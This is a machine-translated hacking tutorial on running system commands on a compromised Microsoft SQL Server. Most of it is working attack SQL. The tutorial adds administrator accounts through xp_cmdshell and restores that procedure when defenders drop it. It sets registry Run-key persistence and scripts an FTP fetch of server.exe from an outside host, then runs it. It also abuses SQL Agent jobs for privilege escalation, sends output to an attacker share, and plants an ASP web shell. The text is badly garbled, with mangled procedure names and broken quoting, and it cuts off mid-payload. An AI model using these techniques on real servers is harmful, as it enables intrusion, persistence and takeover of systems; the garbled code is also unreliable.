How to execute commands in MSSQL

Suppose a host has opened port 1433, and we have used SQL injection or a weak password for remote connection.

How can I add a system administrator user (or execute system commands)

1). xp_{shell 'cmd.exe/c net user aaa bbb/add'

The biggest benefit of a solution that everyone knows is that there is echo, but most afraid

If exists (select * from dbo. sysobjects where id = object_id (n' [dbo]. [xp_mongoshell] ') and OBJECTPROPERTY (id, n' isextendedproc') = 1)

Exec sp_dropextendedproc N '[dbo]. [xp_cmdshell]'

The above T-SQL statement can delete this extended storage

We generally use

2 k:

EXEC sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'

SQL97:

EXEC sp_addextendedproc xp_cmdshell, @ dllname = 'sqlsql70. dll'

It is restored.

However, some people know that sp_addextendedproc can be deleted just like a stored procedure.

Drop PROCEDURE sp_addextendedproc

If exists (select * from

Dbo. sysobjects where id = object_id (n' [dbo]. [xp_mongoshell] ') and

OBJECTPROPERTY (id, n' isextendedproc') = 1)

Exec sp_dropextendedproc N '[dbo]. [xp_cmdshell]'

Restore:

Create procedure sp_addextendedproc --- 1996/08/30 20:13

@ Functname nvarchar (517),/* (owner.) name of function to call */

@ Dllname varchar (255)/* name of DLL containing function */

As

Set implicit_transactions off

If @ trancount> 0

Begin

Raiserror (15002,-1,-1, 'SP _ addextendedproc ')

Return (1)

End

/*

** Create the extended procedure mapping.

*/

Dbcc addextendedproc (@ functname, @ dllname)

Return (0) -- sp_addextendedproc

When I write so much, there is actually the simplest protection method:

NET stop mssqlserver first, and then delete xplog70.dll (xpsql70.dll in SQL97)

Open the service.

2) After reading the above, you will understand that xp_mongoshell can be deleted eventually. Is there any other way?

Write registry 3:

Xp_regwrite 'HKEY _ LOCAL_MacHINE ', 'Software \ Microsoft \ Windows \ currentversion \ run', 'czy82', 'reg _ SZ ', net user czy bb/add

In fact, the registry can be written in several places, such as WEB browsing settings in the registry.

The best way to write the registry is not to show back, but not to use me without running it.

3)

Declare @ s int

Exec sp_oacreate "wscript. shell", @ s out

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo open ASP.7i24.com> c: \ a.txt"

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo 123321> c: \ a.txt"

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo 123321> c: \ a.txt"

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo get server.exe> c: \ a.txt"

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c echo close> c: \ a.txt"

-- Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c ftp-s: c: \ a.txt"

Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c server"

By the way, we can also use sp_oacreate and sp_oamethod.

The system controls such as fso, wsh, and shell are called, but the problem is that they cannot be like xp_mongoshell.

Can't you see the result right away? See the following:

Declare @ s int, @ o int, @ f int, @ str nvarchar (4000)

/* Exec sp_oacreate "wscript. shell", @ s out

Exec sp_oamethod @ s, "run", NULL, "cmd.exe/c net user> c: \ temp.txt "*/

Exec sp_oacreate "scripting. filesystemobject", @ o out

Exec sp_oamethod @ o, "opentextfile", @ f out, "c: \ temp.txt", 1

Exec sp_oamethod @ f, "readall", @ str out

Print @ str

First, execute the annotation and then execute the outside. In fact, the principle is simple: Use> to write the result to a file and then use

Fso to read it! Very practical

4)

Use msdb; -- do not use master here

Exec sp_add_job @ job_name = 'czy82 ';

Exec sp_add_jobstep @ job_name = 'czy82 ', @ step_name = 'exec my SQL', @ subsystem = 'cmdexec ', @ command = 'dir c: \> c: \ B .txt ';

Exec sp_add_jobserver @ job_name = 'czy82 ', @ server_name = 'smscomputer ';

Exec sp_start_job @ job_name = 'czy82 ';

MSSQL Job processing can also execute commands. If the above subsystem parameter is after tsql, we can

The tsql statement is executed.

For the use of these stored procedures, first in @ server_name, We need to specify the name of your SQL Server

The sqlserveragent service of the second system must be enabled (it is not open by default)

Net start SQLSERVERAGENT

There is another difference for this stuff, that is, public can also be executed. Here is also a systematic look at the following

USE msdb

EXEC sp_add_job @ job_name = 'getsystemonsql ',

@ Enabled = 1,

@ Description = 'this will give a low privileged user Access

Xp_mongoshell ',

@ Delete_level = 1

EXEC sp_add_jobstep @ job_name = 'getsystemonsql ',

@ Step_name = 'exec my SQL ',

@ Subsystem = 'tsql ',

@ Command = 'exec master .. xp_execresultset n' 'select ''' exec

Master.. xp_mongoshell "dir> c: \ agent-job-results.txt" ''', n' 'master '''

EXEC sp_add_jobserver @ job_name = 'getsystemonsql ',

@ Server_name = 'your SQL Server name'

EXEC sp_start_job @ job_name = 'getsystemonsql'

Do not doubt that the above Code is successfully tested! Here, we should note that xp_execresultset is because of it.

So that we can execute xp_mongoshell in public mode.

5) the Microsoft SQL Agent Jobs arbitrary file can be deleted and overwritten (public users can also)

There is an article in Ann Jiao: http://www.xfocus.net/vuln/vul_view.PHP? Vul_id = 2968

USE msdb

EXEC sp_add_job @ job_name = 'arbitraryfilecreate ',

@ Enabled = 1,

@ Description = 'this will create a file called c: \ sqlafc123.txt ',

@ Delete_level = 1

EXEC sp_add_jobstep @ job_name = 'arbitraryfilecreate ',

@ Step_name = 'sqla

FC ',

@ Subsystem = 'tsql ',

@ Command = 'select' hello, this file was created by the SQL Agent .''',

@ Output_file_name = 'C: \ sqlafc123.txt'

EXEC sp_add_jobserver @ job_name = 'arbitraryfilecreate ',

@ Server_name = 'server _ name'

EXEC sp_start_job @ job_name = 'arbitraryfilecreate'

If the subsystem option is: tsql has the following content in the header of the generated file:

?? When rbitraryFileCreate? ? 1 ?, QLAFC? ???? 18:24:19

----------------------------------------------

Hello, this file was created by the SQL Agent.

(1 ?????)

Therefore, it is recommended that you select cmdexec as the subsystem to generate a file. If you make good use of the file, you can write an add administrator.

Command VBs file to the startup directory!

6) sp_makewebtask (files with arbitrary content and any file name can be written)

The following example shows sp_MScopyscriptfile.

Declare @ command varchar (100)

Declare @ scripfile varchar (200)

Set concat_null_yields_null off

Select @ command = 'dir c: \> "\ attackerip \ share \ dir.txt "'

Select @ scripfile = 'C: \ autoexec. bat> nul "| '+ @ command +' | rd "'

Exec sp_MScopyscriptfile @ scripfile ,''

Both are still being tested.

Let the public user of MSSQL get a local web shell :)

Sp_makewebtask @ outputfile = 'd: \ sms \ a. asp ', @ charset = gb2312,

-- @ Query = 'select '''''

-- @ Query = 'select '''''

@ Query = 'select''

"Method =" POST ">